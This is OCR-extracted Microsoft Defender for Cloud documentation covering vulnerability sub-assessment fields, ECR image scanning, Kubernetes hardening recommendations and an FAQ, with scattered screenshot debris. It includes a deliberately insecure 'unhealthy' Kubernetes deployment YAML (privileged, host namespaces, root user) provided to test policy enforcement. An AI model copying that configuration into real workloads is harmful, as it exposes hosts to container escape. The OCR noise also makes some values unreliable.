SecuritySubAssessmentList 
ArtifactDetails 
SoftwareDetails 
FixReference 

OS Details 
VulnerabilityDetails 

CPE 

Cwe 
VulnerabilityReference 


ExploitabilityAssessment 


Description 

Security subassessment on a resource 
List of security subassessments 

Details for the affected container image 
Details for the affected software package 
Details on the fix, if available 

Details on the os information 

Details on the detected vulnerability 
Common Platform Enumeration 
Common weakness enumeration 
Reference links to vulnerability 


Reference links to an example exploit 


AzureContainerRegistryVulnerability (MDVM) 


Other context fields for Azure container registry vulnerability assessment 


Name Type Description 

assessedResourcelType string: Subassessment resource 
AzureContainerRegistryVulnerability type 

cvssV30Score Numeric CVSS V3 Score 


vulnerabilityDetails VulnerabilityDetails 


artifactDetails ArtifactDetails 


softwareDetails SoftwareDetails 


ArtifactDetails 


Context details for the affected container image 


Name Description 


Type 


repositoryName String Repository name 


Name 

RepositoryHost 
lastPublishedToRegistryUTC 
artifactType 

mediaType 

Digest 


Tags 


Software Details 


Type 

String 

Timestamp 

String: Containerlmage 
String 

String 


String 


Details for the affected software package 


Name Type 
fixedVersion String 
category String 
osDetails OsDetails 
language String 
version String 
vendor String 


packageName String 


fixStatus String 
evidence String Evidence for the package 
fixReference FixReference 

FixReference 


Details on the fix, if availa 


Name 


ID 


Description 


Fixed Version 


Description 
Repository host 


UTC timestamp for last publish date 


Layer media type 
Digest of vulnerable image 


Tags of vulnerable image 


Vulnerability category — OS or Language 


Language of affected package (for example, Python, .NET) could 


also be empty 


Unknown, FixAvailable, NoFixAvailable, Scheduled, WontFix 


ble 


Type description 


String Fix ID 


Name 
Description 
releaseDate 


url 


OS Details 


Type 
String 
Timestamp 


String 


Details on the os information 


Name 


osPlatform 


osName 


osVersion 


description 
Fix Description 
Fix timestamp 


URL to fix notification 


Type Description 

String For example: Linux, Windows 
String For example: Ubuntu 

String 


VulnerabilityDetails 


Details on the detected vulnerability 


Severity 
LastModifiedDate 
publishedDate 
ExploitabilityAssessment 


CVSS 


Workarounds 
References 
Weaknesses 
cveld 


Cpe 


Severity 

Timestamp 

Timestamp 
ExploitabilityAssessment 


Dictionary <string, 
CVSS> 


Workaround 
VulnerabilityReference 
Weakness 

String 


CPE 


The sub-assessment severity level 


Published date 


Dictionary from cvss version to cvss details 
object 


Published workarounds for vulnerability 


CVE ID 


CPE (Common Platform Enumeration) 


Name Type 
language String 
softwareEdition String 
Version String 
targetSoftware String 
vendor String 
product String 
edition String 
update String 
other String 
part String 
uri String 
Weakness 

Name Type 
Cwe Cwe 


Description 


Language tag 


Package version 
Target Software 
Vendor 


Product 


Applications Hardware OperatingSystems 


CPE 2.3 formatted uri 


Description 


Cwe (Common weakness enumeration) 


CWE details 
Name Type 
ID String 


VulnerabilityReference 
Reference links to vulnerability 
Name Type 


link String 


title String 


description 


CWE ID 


Description 
Reference url 


Reference title 


ExploitabilityAssessment 


Reference links to an example exploit 


Name Type Description 

exploitUris String 

exploitStepsPublished Boolean Had the exploits steps been published 
exploitStepsVerified Boolean Had the exploit steps verified 
isInExploitKit Boolean Is part of the exploit kit 


types String Exploit types, for example: NotAvailable, Dos, Local, Remote, 
WebApps, PrivilegeEscalation 


AzureResourceDetails 


Details of the Azure resource that was assessed 


Name Type Description 
ID string Azure resource ID of the assessed resource 
source string: Azure The platform where the assessed resource resides 


SecuritySubAssessment 


Security subassessment on a resource 


Name Type Description 

ID string Resource ID 

name string Resource name 

properties.additionalData AdditionalData: Details of the 
AzureContainerRegistryVulnerability subassessment 

properties.category string Category of the 

subassessment 
properties.description string Human readable 


description of the 
assessment status 


Name Type Description 


properties.displayName string User friendly display 
name of the 
subassessment 

properties.id string Vulnerability ID 

properties.impact string Description of the impact 


of this subassessment 


properties.remediation string Information on how to 
remediate this 
subassessment 

properties.resourceDetails | ResourceDetails: AzureResourceDetails Details of the resource 


that was assessed 


properties.status SubAssessmentStatus Status of the 
subassessment 
properties.timeGenerated string The date and time the 
subassessment was 
generated 
type string Resource type 
SecuritySubAssessmentList 
List of security subassessments 
Name Type Description 
nextLink string The URI to fetch the next page. 


value SecuritySubAssessment Security subassessment on a resource 


Use Defender for Containers to scan 
your Amazon AWS Elastic Container 
Registry images for vulnerabilities 
(Preview) 


Article e 06/14/2023 


Defender for Containers lets you scan the container images stored in your Amazon AWS 
Elastic Container Registry (ECR) as part of the protections provided within Microsoft 
Defender for Cloud. 


To enable scanning of vulnerabilities in containers, you have to connect your AWS 
account to Defender for Cloud and enable Defender for Containers. The agentless 
scanner, powered by the open-source scanner Trivy, scans your ECR repositories and 
reports vulnerabilities. 


Defender for Containers creates resources in your AWS account to build an inventory of 
the software in your images. The scan then sends only the software inventory to 
Defender for Cloud. This architecture protects your information privacy and intellectual 
property, and also keeps the outbound network traffic to a minimum. 


These resources are created under us-east-1 and eu-central-1 in each AWS account 
where container vulnerability assessment is enabled: 


e S3 bucket with the prefix defender-for-containers-va 
e ECS cluster with the name defender-for-containers-va 
e VPC 

o Tag name with the value defender-for-containers-va 

o IP subnet CIDR 10.0.0.0/16 

o Associated with default security group with the tag name and the value 
defender-for-containers-va that has one rule of all incoming traffic. 

o Subnet with the tag name and the value defender-for-containers-va in the 
defender-for-containers-va VPC with the CIDR 10.0.1.0/24 IP subnet used by 
the ECS cluster defender-for-containers-va 

o Internet Gateway with the tag name and the value defender-for-containers-va 

o Route table - Route table with the tag name and value defender-for- 
containers-va, and with these routes: 

o Destination: @.0.0.0/0; Target: Internet Gateway with the tag name and the 


value defender-for-containers-va 


o Destination: 10.0.0.0/16; Target: local 


Defender for Cloud filters and classifies findings from the software inventory that the 
scanner creates. Images without vulnerabilities are marked as healthy and Defender for 
Cloud doesn't send notifications about healthy images to keep you from getting 


unwanted informational alerts. 
The triggers for an image scan are: 


e On push - Whenever an image is pushed to your registry, Defender for Containers 
automatically scans that image within 2 hours. 


e Continuous scan - Defender for Containers reassesses the images based on the 
latest database of vulnerabilities of Trivy. This reassessment is performed twice a 
day for 90 days after an image is pushed to the registry. 


Prerequisites 


Before you can scan your ECR images: 


e Connect your AWS account to Defender for Cloud and enable Defender for 
Containers 
e You must have at least one free VPC in the us-east-1 and eu-central-1 regions to 


host the AWS resources that build the software inventory. 


For a list of the types of images not supported by Microsoft Defender for Containers, 


see Availability. 


Enable vulnerability assessment 
To enable vulnerability assessment: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the AWS connector that connects to your AWS account. 


ill Microsoft Defender for Cloud | Environment settings 


P Search (Ctrl+/) « ++ Add environment v GO Refresh a Guides & Feedback 


Showing 74 subscriptions 


General 

& 74 GRA 
Ọ overview Azure subscriptions AWS accounts 
eliteek | P& Search by name | 


a 
d 


Cloud Security 


9 
9 


Recommendations Expand all 


Security alerts 
Name Ty Total resources Ty Defender coverage Ty Standards Ty 
Inventory 
Workbooks V © Azure 
Community > (©) 72f988bf (22 of 22 subscriptions) 11131 A Limited permissions 


Diagnose and solve problems > (©) 4b2462a4 EE 


WV O AWS (preview) 


E ContosoConnector 1685 
Secure Score d 


Regulatory compliance 


D workload protections 


E 


Firewall Manager 


Management 


2/3 plans 


A Limited permissions 


AWS CIS 1.2.0 (preview), ... 


3. In the Monitoring Coverage section of the Containers plan, select Settings. 


Home 


Microsoft Defender for Cloud | Environment settings > 


1) Settings | Defender plans 


Showing account ‘containerVA-demo’ 


Settings 


E Defender plans 


E Standards 


« @) Account details Select plans (2) Configure access C) Review and generate 


Select plans 


Select the desired capabilities, Each capability will require different access permissions and might incur charges. 


© When keeping more than one trail in AWS CloudTrail, or exporting the trail to SIEM, ingestion costs may increase. Learn more 


Policy settings 


Plan 


® Governance rules (preview) 


4. Tur 


© Cloud security Posture Management 
agentless scans of 
receive hardening recommenda 


ir AWS workloads, Defender for Cloud will help discover and prevent mi 
je able to view your AWS resources in a unified asset inventory, and 


figurations, You'll 


Protect your machines with threat detection and advanced defenses. Connect your EC2 instances to Azure with Azure Arc. 


E Databases 
Protect your SQL servers on EC2 machines and ADS Custom for SQL Server instances with threat protection and vulnerability 
assessment. Discover and register your SQL server on EC2 machines powered by Azure Arc. 

© Containers 
Provides real-time threat protection for the EKS clusters and generates alerts for suspicious activities, Defender for Cloud will get 
write access to EKS and CloudWatch control plane configuration and will create and manage its own resources in your AWS account. 


n on Vulnerability assessment. 


Plan 2 (S15/Server/Month) 
Select tier > 


158/Server/Month 


Free 


Monitoring coverage Status 


Permissions: Read (SecurityAudit) 


© Fui 4 >) 
b ZE ZZ. 


© Full or 


Settings > 


9. 


Defender for Containers configuration x 


Kubernetes audit logs to Microsoft Defender ED On 


Defender for Containers requires control plane audit logs to provide runtime threat detection. 
The logs will be sent from the EKS control plane to your account's CloudWatch logs. $3, 
Kinesis, and SQS resources will also be created. 


Retention period (days) * © 30 Vv 


GO For details of the costs involved, see the pricing pages for CloudWatch $3, Kinesis, and SOS. 


Vulnerability assessment 


Enables vulnerability assesment for your ECR images 


. Select Save > Next: Configure access. 
. Download the CloudFormation template. 


. Using the downloaded CloudFormation template, create the stack in AWS as 
instructed on screen. If you're onboarding a management account, you'll need to 
run the CloudFormation template both as Stack and as StackSet. It takes up to 30 
minutes for the AWS resources to be created. The resources have the prefix 


defender-for-containers-va. 
. Select Next: Review and generate. 


Select Update. 


Findings are available as Defender for Cloud recommendations from 2 hours after 


vulnerability assessment is turned on. The recommendation also shows any reason that 


a repository is identified as not scannable ("Not applicable"), such as images pushed 


more than 3 months before you enabled vulnerability assessment. 


View and remediate findings 


Vulnerability assessment lists the repositories with vulnerable images as the results of 
the Elastic container registry images should have vulnerability findings resolved z 
recommendation. From the recommendation, you can identify vulnerable images and 
get details about the vulnerabilities. 


Vulnerability findings for an image are still shown in the recommendation for 48 hours 
after an image is deleted. 


1. To view the findings, open the Recommendations page. If the scan found issues, 
you'll see the recommendation Elastic container registry images should have 
vulnerability findings resolved Z. 


© Name ty 
W Remediate vulnerabilities 


Elastic container registry images should have vulnerability findings resolved 


2. Select the recommendation. 


The recommendation details page opens with additional information. This 
information includes the list of repositories with vulnerable images ("Affected 
resources") and the remediation steps. 


3. Select specific repositories to the vulnerabilities found in images in those 
repositories. 


Home > Microsoft Defender for Cloud | Recommendations 


Elastic container registry images should have vulnerability findings resolved ~ 


E open query v 


Severity Freshness interval h most sever 
IEE © 60 Min & 5/8 OO 841 logstash 513 Critical 15. 


python 337 High 103 mm 


The vulnerabilities section shows the identified vulnerabilities. 
4. To learn more about a vulnerability, select the vulnerability. 


The vulnerability details pane opens. 


Home > Microsoft Defender for Cloud | Recommendations CVE-2021-30473 
Elastic container registry images should have vulnerability findings resolved 


Title and description 
E open query 


Severity Freshness interval Unhealthy repositories Total vulnerable images Total vulnerabilities 


eve tories with most vulnera 
[High GO 60 Min ge OO 5 [x] 841 logstash 513 
Out of 8 scanned 


A Additional information 


Weakness details 


Source Debian Security Tracker 


1of8 scanned images Remediation/patch details 
^ Affected resources 


Digest os Repository Account Region 


E erten Lin 


This pane includes a detailed description of the issue and links to external 
resources to help mitigate the threats. 


5. Follow the steps in the remediation section of the recommendation. 


6. When you've taken the steps required to remediate the security issue, replace the 
image in your registry: 


a. Push the updated image to trigger a scan. 


b. Check the recommendations page for the recommendation Container registry 
images should have vulnerability findings resolved £. 


If the recommendation still appears and the image you've handled still appears 
in the list of vulnerable images, check the remediation steps again. 


c. When you're sure the updated image has been pushed, scanned, and is no 


longer appearing in the recommendation, delete the “old” vulnerable image 
from your registry. 


Next steps 
Learn more about: 


e Defender for Cloud Defender plans 
e Multicloud protections for your AWS account 


e Check out common questions about Defender for Containers. 


Protect your Kubernetes data plane 
hardening 


Article e 09/04/2023 
This page describes how to use Microsoft Defender for Cloud's set of security 
recommendations dedicated to Kubernetes data plane hardening. 

Ọ Tip 


For a list of the security recommendations that might appear for Kubernetes 
clusters and nodes, see the Container recommendations section of the 


recommendations reference table. 


Set up your workload protection 


Microsoft Defender for Cloud includes a bundle of recommendations that are available 


once you've installed the Azure Policy for Kubernetes. 


Prerequisites 


e Add the Required FQDN/application rules for Azure policy. 
e (For non AKS clusters) Connect an existing Kubernetes cluster to Azure Arc. 


Enable Kubernetes data plane hardening 


You can enable the Azure Policy for Kubernetes by one of two ways: 


e Enable for all current and future clusters using plan/connector settings 
o Enabling for Azure subscriptions or on-premises 
o Enabling for GCP projects 

e Deploy Azure Policy for Kubernetes on existing clusters 


Enable Azure Policy for Kubernetes for all current and 
future clusters using plan/connector settings 


© Note 


When you enable this setting, the Azure Policy for Kubernetes pods are installed on 
the cluster. Doing so allocates a small amount of CPU and memory for the pods to 
use. This allocation might reach maximum capacity, but it doesn't affect the rest of 
the CPU and memory on the resource. 


O Note 


Enablement for AWS via the connector is not supported due to a limitation in EKS 
that requires the cluster admin to add permissions for a new IAM role on the 
cluster itself. 


Enabling for Azure subscriptions or on-premises 


When you enable Microsoft Defender for Containers, the "Azure Policy for Kubernetes" 
setting is enabled by default for the Azure Kubernetes Service, and for Azure Arc- 
enabled Kubernetes clusters in the relevant subscription. If you disable the setting on 
initial configuration, you can enable it afterwards manually. 


If you disabled the "Azure Policy for Kubernetes" settings under the containers plan, you 
can follow the below steps to enable it across all clusters in your subscription: 


1. Sign in to the Azure portal £. 

2. Navigate to Microsoft Defender for Cloud > Environment settings. 
3. Select the relevant subscription. 

4. On the Defender plans page, ensure that Containers is toggled to On. 


5. Select Settings. 


Home 


gı Settings | Defender plans x 
ASC DEM 


A Porta Cone 


Storage 


6. In the Settings & Monitoring page, toggle the "Azure Policy for Kubernetes" to On. 


Home > Settings | Defender plans 


Settings & monitoring x 


ASC DEMO 


n, it will be installed on any new or existing resource, by assigning a security policy. 


Defenders plans : Containers 


‘Component fender plans Configuration Status 


Defender Daemonset 


Azure Policy for Kubemetes 


nner. 
e Service (AKS), will be deployed as an add-on. On Arc clusters, will be deployed as an 


Container registries vulnerability assessments (preview) Provides vulnerability management for images stored in your container registries. Sh $ €D ZEKO 


Enabling for GCP projects 


When you enable Microsoft Defender for Containers on a GCP connector, the "Azure 
Policy Extension for Azure Arc" setting is enabled by default for the Google Kubernetes 
Engine in the relevant project. If you disable the setting on initial configuration, you can 
enable it afterwards manually. 


If you disabled the "Azure Policy Extension for Azure Arc" settings under the GCP 
connector, you can follow the below steps to enable it on your GCP connector. 


Deploy Azure Policy for Kubernetes on existing clusters 


You can manually configure the Azure Policy for Kubernetes on existing Kubernetes 
clusters through the Recommendations page. Once enabled, the hardening 
recommendations become available (some of the recommendations require another 


configuration to work). 


O Note 


For AWS it isn't possible to do onboarding at scale using the connector, but it can 
be installed on all existing clusters or on specific clusters using the 
recommendation Azure Arc-enabled Kubernetes clusters should have the Azure 
policy extension for Kubernetes extension installed Z . 


To deploy the Azure Policy for Kubernetes to specified clusters: 


1. From the recommendations page, search for the relevant recommendation: 


e Azure - "Azure Kubernetes Service clusters should have the Azure Policy 


add-on for Kubernetes installed" 


e GCP - "GKE clusters should have the Azure Policy extension". 


e AWS and On-premises - "Azure Arc-enabled Kubernetes clusters should 


have the Azure policy extension for Kubernetes extension installed". 


jefender for Cloud 


efender for Cloud | Recommendations 


] ©) Refresh L Download Sv report "$ Open query E Governance report Geren Feedback 


S recommendations Al dati 
@ Azure @ aws @ccP 
GO E = 
2 a Attack path . 
E 40% Š= 191/268 a Mie e A 
Secure score © Active recommendati x 
E, Cloud Security Explorer 
E workbooks Recommendation status ==None X Severity == None X Resourcetype == None X ip Ad fiter V More B) Show my tems only: @ _) off 
& Communit ity 
ZAA © Name ty Max score a Current score ty Potential score increase Ty Status Ty Unhealthy resource s Insights 
Cloud Security an pel +m 
© security posture 
E Regulatory compliance 4 283 000 + 4% 113 of 1073 re 
Workload protections > Remediate security cont 4 141 Of + 9% 647 of 893 re 
E Firewall Manager > Restrict unauthor 4 Od re 490 of 1155 r 
E 
E DevOps Security Preview) > Protect applications against DDoS attacks 2 BG 1% 


25 of 138 resources = 
Management 


@ Tip 


The recommendation is included in different security controls, and it 


doesn't matter which one you select in the next step. 


2. From any of the security controls, select the recommendation to see the resources 
on which you can install the add-on. 


3. Select the relevant cluster, and select Remediate. 


Home > Microsoft Defender for Cloud | Recommendations 
Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed 
© Exempt © Enforce @ view policy definition E Open query 


Severity reshness interval 


Freshi 
E @ 0Min 


A^ Remediation steps 


to deploy this add 


ing of extensions, 


ing for the ac led by default in all existing and future clusters (that meet the add-on installa 


tion requirements) 
A. Affected resources 


Unhealthy resources (3) Healthy resources (22) Not applicable resources (0) 


b 


[E] Name Ty Subscription Owner 4 Due date Status 


E & anis-test-publisher-aks Rome ILDC - Detection Dev 


View and configure the bundle of 
recommendations 
Approximately 30 minutes after the Azure Policy for Kubernetes installation completes, 


Defender for Cloud shows the clusters’ health status for the following recommendations, 
each in the relevant security control as shown: 


© Note 


If you're installing the Azure Policy for Kubernetes for the first time, these 


recommendations will appear as new additions in the list of recommendations. 


Q Tip 


Some recommendations have parameters that must be customized via Azure Policy 


to use them effectively. For example, to benefit from the recommendation 


Container images should be deployed only from trusted registries, you'll have to 


define your trusted registries. If you don't enter the necessary parameters for the 


recommendations that require configuration, your workloads will be shown as 


unhealthy. 


Recommendation name 


Container CPU and memory limits should 
be enforced 


Container images should 
be deployed only from trusted registries 


Least privileged Linux capabilities should be 
enforced for containers 


Containers should only use allowed 
AppArmor profiles 


Services should listen on allowed ports 
only 


Usage of host networking and ports 
should be restricted 


Usage of pod HostPath volume mounts 
should be restricted to a known list 


Container with privilege escalation should 
be avoided 


Containers sharing sensitive host 
namespaces should be avoided 


Immutable (read-only) root filesystem 
should be enforced for containers 


Security Control 


Protect applications against 
DDoS attack 


Remediate vulnerabilities 


Manage access 
and permissions 


Remediate security 
configurations 


Restrict unauthorized 
network access 


Restrict unauthorized network 
access 


Manage access and 
permissions 


Manage access 
and permissions 


Manage access and 
permissions 


Manage access 
and permissions 


Configuration 


required 


Yes 


Yes 


Yes 


Yes 


Yes 


Yes 


Yes 


No 


No 


No 


Recommendation name 


Kubernetes clusters should be accessible 
only over HTTPS 


Kubernetes clusters should disable 
automounting API credentials 


Kubernetes clusters should not use the 
default namespace 


Kubernetes clusters should not grant 
CAPSYSADMIN security capabilities 


Privileged containers should be avoided 


Running containers as root user should be 
avoided 


For recommendations with parameters that need to be customized, you need to set the 


parameters: 
To set the parameters: 


1. Sign in to the Azure portal £. 


Security Control 


Encrypt data in transit 


Manage access 
and permissions 


Implement security best 
practices 


Manage access and 
permissions 


Manage access 
and permissions 


Manage access 
and permissions 


Configuration 


required 


No 


No 


No 


No 


No 


No 


2. Navigate to Microsoft Defender for Cloud > Environment settings. 


3. Select the relevant subscription. 


4. From Defender for Cloud's menu, select Security policy. 


5. Select the relevant assignment. The default assignment is ASC default. 


6. Open the Parameters tab and modify the values as required. 


Containers should listen on allowed ports only* © 


| audit 


Do Eh 


audit 
deny 


O 


disabled 


7. Select Review + save. 


8. Select Save. 
To enforce any of the recommendations: 


1. Open the recommendation details page and select Deny: 


Dashboard > Microsoft Defender for Cloud 


Container CPU and memory limits should be enforced & x 


Severity Freshness interval 
pme & 30 Min 
v Description 


v Additional Information 
vw Remediation steps 


^ Affected resources 


Unhealthy resources (3) Healthy resources (4) Not applicable resources (0) 


| Ø Search managed clusters 


JU Name ty Subscription 
(C $> workload-protection-preview ASC DEMO 

(O $> asc-workload-protection MayaProdTest2 
C $> asc-aks-cloud-talk ASC DEMO 


The pane to set the scope opens. 
2. Set the scope and select Change to deny. 
To see which recommendations apply to your clusters: 


1. Open Defender for Cloud's asset inventory page and set the resource type filter to 
Kubernetes services. 


2. Select a cluster to investigate and review the available recommendations available 
for it. 


When you view a recommendation from the workload protection set, the number of 
affected pods ("Kubernetes components") is listed alongside the cluster. For a list of the 


specific pods, select the cluster and then select Take action. 


Dashboard > Security Center 


asc-workload-protection & x 


Kubernetes service security health 


Resource health Total recommendations Recommendations summary 
owe asc-workload-protection 11 High 5 M 
oon 
Medium S B 
Low 1 B 


v Kubernetes service information 


“ Recommendation list 


Recommendations (11) Passed assessments (8) Unavailable assessments (0) 

Recommendation Ty Kubernetes components Effect Status 
Running containers as root user should be avoided (Preview) 2 Pod Audit @ High 
Audit diagnostic setting N/A N/A @ Low 
Pod Security Policies should be defined on Kubernetes Service... N/A Audit @ High 
Authorized IP ranges should be defined on Kubernetes Services N/A Audit @ High 
Overriding or disabling of containers AppArmor profile should... 5 Pod Audit @ High 
Container images should be deployed from trusted registries ... 2 Pod Deny @ High 
Privileged containers should be avoided (Preview) 1 Pod Deny A Medium 
Container CPU and memory limits should be enforced (Preview) 5 Pod Audit A Medium 
Usage of pod HostPath volume mounts should be restricted t... 1 Pod Audit A Medium 
Container with privilege escalation should be avoided (Preview) 2 Pod Audit A Medium 
Immutable (read-only) root filesystem should be enforced for ... 2 Pod Audi A Medium 


EO 


To test the enforcement, use the two Kubernetes deployments below: 


e One is for a healthy deployment, compliant with the bundle of workload protection 
recommendations. 


e The other is for an unhealthy deployment, noncompliant with any of the 
recommendations. 


Deploy the example .yaml files as-is, or use them as a reference to remediate your own 
workload. 


Healthy deployment example .yaml file 


yml 


apiVersion: apps/v1 
kind: Deployment 
metadata: 
name: redis-healthy-deployment 
labels: 
app: redis 
spec: 
replicas: 3 


selector: 
matchLabels: 
app: redis 
template: 
metadata: 
labels: 
app: redis 
annotations: 
container.apparmor.security.beta.kubernetes.io/redis: 
runtime/default 
spec: 
containers: 
- name: redis 
image: <customer-registry>.azurecr.io/redis: latest 


ports: 
- containerPort: 80 
resources: 
limits: 
cpu: 100m 
memory: 25@Mi 
securityContext: 


privileged: false 
readOnlyRootFilesystem: true 
allowPrivilegeEscalation: false 
runAsNonRoot: true 
runAsUser: 1000 

apiVersion: v1 

kind: Service 


metadata: 

name: redis-healthy-service 
spec: 

type: LoadBalancer 

selector: 

app: redis 
ports: 
= POCE: R30 


targetPort: 80 


Unhealthy deployment example .yaml file 


yml 


apiVersion: apps/v1 
kind: Deployment 
metadata: 
name: redis-unhealthy-deployment 
labels: 
app: redis 
spec: 
replicas: 3 
selector: 


matchLabels: 
app: redis 
template: 
metadata: 
labels: 

app: redis 

spec: 
hostNetwork: true 
hostPID: true 
hostIPC: true 
containers: 
- name: redis 

image: redis:latest 

ports: 

- containerPort: 9001 
hostPort: 9001 

securityContext: 
privileged: true 
readOnlyRootFilesystem: false 
allowPrivilegeEscalation: true 
runAsUser: @ 
capabilities: 

add: 
- NET_ADMIN 

volumeMounts: 

- mountPath: /test-pd 
name: test-volume 
readOnly: true 

volumes: 
- name: test-volume 

hostPath: 

# directory location on host 
path: /tmp 

apiVersion: v1 

kind: Service 


metadata: 

name: redis-unhealthy-service 
spec: 

type: LoadBalancer 

selector: 

app: redis 
ports: 
- port: 6001 


targetPort: 9001 


Next steps 


In this article, you learned how to configure Kubernetes data plane hardening. 


For related material, see the following pages: 


e Defender for Cloud recommendations for compute 
e Alerts for AKS cluster level 


Common questions about 
Defender for Containers 


FAQ 


Get answers to common questions about Microsoft Defender for Containers. 


What are the options to enable the new 
plan at scale? 


You can use the Azure Policy Configure Microsoft Defender for Containers to be 
enabled, to enable Defender for Containers at scale. You can also see all of the options 


that are available to enable Microsoft Defender for Containers. 


Does Microsoft Defender for Containers 
support AKS clusters with virtual 
machines scale sets? 


Yes. 


Does Microsoft Defender for Containers 
support AKS without scale set (default)? 


No. Only Azure Kubernetes Service (AKS) clusters that use Virtual Machine Scale Sets for 
the nodes is supported. 


Do | need to install the Log Analytics 
VM extension on my AKS nodes for 
security protection? 


No, AKS is a managed service, and manipulation of the laaS resources isn't supported. 
The Log Analytics VM extension isn't needed and may result in extra charges. 


How can I use my existing Log Analytics 
workspace? 


You can use your existing Log Analytics workspace by following the steps in the Assign a 
custom workspace workspace section of this article. 


Can | delete the default workspaces 
created by Defender for Cloud? 


We don't recommend deleting the default workspace. Defender for Containers uses the 
default workspaces to collect security data from your clusters. Defender for Containers 
will be unable to collect data, and some security recommendations and alerts, will 
become unavailable if you delete the default workspace. 


| deleted my default workspace, how 
can | get it back? 


To recover your default workspace, you need to remove the Defender agent, and 
reinstall the agent. Reinstalling the Defender agent creates a new default workspace. 


Where is the default Log Analytics 
workspace located? 


Depending on your region, the default Log Analytics workspace located will be located 
in various locations. To check your region see Where is the default Log Analytics 
workspace created? 


My organization requires me to tag my 
resources, and the required agent didn't 
get installed, what went wrong? 


The Defender agent uses the Log analytics workspace to send data from your 
Kubernetes clusters to Defender for Cloud. The Defender for Cloud adds the Log 
analytic workspace and the resource group as a parameter for the agent to use. 


However, if your organization has a policy that requires a specific tag on your resources, 
it may cause the agent installation to fail during the resource group or the default 
workspace creation stage. If it fails, you can either: 


e Assign a custom workspace and add any tag your organization requires. 
or 


e |f your company requires you to tag your resource, you should navigate to that 
policy and exclude the following resources: 


1. The resource group DefaultResourceGroup-<RegionShortCode> 


2. The Workspace DefaultWorkspace-<sub-id>-<RegionShortCode> 


RegionShortCode is a 2-4 letters string. 


How does Defender for Containers scan 
an image? 


Defender for Containers pulls the image from the registry and runs it in an isolated 
sandbox with the Qualys scanner. The scanner extracts a list of known vulnerabilities. 


Defender for Cloud filters and classifies findings from the scanner. When an image is 
healthy, Defender for Cloud marks it as such. Defender for Cloud generates security 
recommendations only for images that have issues to be resolved. By only notifying you 
when there are problems, Defender for Cloud reduces the potential for unwanted 


informational alerts. 


How can | identify pull events 
performed by the scanner? 


To identify pull events performed by the scanner, do the following steps: 


1. Search for pull events with the UserAgent of AzureContainerlmageScanner. 
2. Extract the identity associated with this event. 
3. Use the extracted identity to identify pull events from the scanner. 


What is the difference between Not 
Applicable Resources and Unverified 


Resources? 


e Not applicable resources are resources for which the recommendation can't give a 
definitive answer. The not applicable tab includes reasons for each resource that 
could not be assessed. 

e Unverified resources are resources that have been scheduled to be assessed, but 
have not been assessed yet. 


Does Microsoft share any information 
with Qualys in order to perform image 
scans? 


No, the Qualys scanner is hosted by Microsoft, and no customer data is shared with 
Qualys. 


Why is Defender for Cloud alerting me 
to vulnerabilities about an image that 
isn't in my registry? 


Some images may reuse tags from an image that was already scanned. For example, you 
may reassign the tag “Latest” every time you add an image to a digest. In such cases, the 
‘old’ image does still exist in the registry and may still be pulled by its digest. If the 
image has security findings and is pulled, it will expose security vulnerabilities. 


Does Defender for Containers scan 
images in Microsoft Container Registry? 


Currently, Defender for Containers can scan images in Azure Container Registry (ACR) 
and AWS Elastic Container Registry (ECR) only. Docker Registry, Microsoft Artifact 
Registry/Microsoft Container Registry, and Microsoft Azure Red Hat OpenShift (ARO) 
built-in container image registry are not supported. Images should first be imported to 
ACR. Learn more about importing container images to an Azure container registry. 


Can | get the scan results via REST API? 


Yes. The results are under Sub-Assessments REST API. Also, you can use Azure Resource 
Graph (ARG), the Kusto-like API for all of your resources: a query can fetch a specific 
scan. 


How do I check which media type my 
containers are using? 


To check an image type, you need to use a tool that can check the raw image manifest 
such as skopeo 7 , and inspect the raw image format. 


e For the Docker v2 format, the manifest media type would be 
application/vnd.docker.distribution.manifest.v1+json or 
application/vnd.docker.distribution.manifest.v2+json, as documented here Z. 

e For the OCI image format, the manifest media type would be 
application/vnd.oci.image.manifest.v1+json, and config media type 
application/vnd.oci.image.config.v1+json, as documented here”. 


What's the agentless discovery for 
Kubernetes refresh interval? 


Agentless information in Defender for Containers is updated through a snapshot 
mechanism. It can take up to 6 hours to see results in cloud security explorer. 


Next steps 


Learn about Defender for Containers 


Introduction to Microsoft Defender for 
Kubernetes (deprecated) 


Article e 06/14/2023 


Defender for Cloud provides real-time threat protection for your Azure Kubernetes 
Service (AKS) containerized environments and generates alerts for suspicious activities. 
You can use this information to quickly remediate security issues and improve the 


security of your containers. 


Threat protection at the cluster level is provided by the analysis of the Kubernetes audit 
logs. Host-level threat detection for your Linux AKS nodes is available if you enable 
Microsoft Defender for Servers and its Log Analytics agent. However, if your cluster is 
deployed on an Azure Kubernetes Service virtual machine scale set, the Log Analytics 


agent isn't currently supported. 


Availability 


@ Important 


Microsoft Defender for Kubernetes has been replaced with Microsoft Defender for 
Containers. If you've already enabled Defender for Kubernetes on a subscription, 
you can continue to use it. However, you won't get Defender for Containers’ 


improvements and new features. 
This plan is no longer available for subscriptions where it isn't already enabled. 


To upgrade to Microsoft Defender for Containers, open the Defender plans page in 


the portal and enable the new plan: 


es Kubermetes (deprecated) 2 kubernetes cores (t) Update available © Gu Off 


d Container registries (deprecated) 1 container registries © Update available © | 


Learn more about this change in the release note. 


Aspect Details 


Release state: Deprecated (Use Microsoft Defender for Containers) 


Aspect Details 


Required roles and permissions: Security admin can dismiss alerts. 
Security reader can view findings. 


Clouds: © Commercial clouds 
© National (Azure Government, Azure China 21Vianet) 


What are the benefits of Microsoft Defender 
for Kubernetes? 


Our global team of security researchers constantly monitor the threat landscape. As 
container-specific alerts and vulnerabilities are discovered, these researchers add them 
to our threat intelligence feeds and Defender for Cloud alerts you to any that are 
relevant for your environment. 


In addition, Microsoft Defender for Kubernetes provides cluster-level threat protection 
by monitoring your clusters' logs. This means that security alerts are only triggered for 
actions and deployments that occur after you've enabled Defender for Kubernetes on 
your subscription. 


Examples of security events that Microsoft Defenders for Kubernetes monitors include: 


e Exposed Kubernetes dashboards 
e Creation of high privileged roles 
e Creation of sensitive mounts. 


For a full list of the cluster level alerts, see alerts with "K8S_" prefix in the alert type in the 
reference table of alerts. 


FAQ - Microsoft Defender for Kubernetes 


e What happens to subscriptions with Microsoft Defender for Kubernetes or 
Microsoft Defender for Containers enabled? 

e Is Defender for Containers a mandatory upgrade? 

e How can I calculate my potential price change? 


What happens to subscriptions with Microsoft Defender 
for Kubernetes or Microsoft Defender for Containers 
enabled? 


Subscriptions that already have one of these plans enabled can continue to benefit from 
it. 

If you haven't enabled them yet, or create a new subscription, these plans can no longer 
be enabled. 

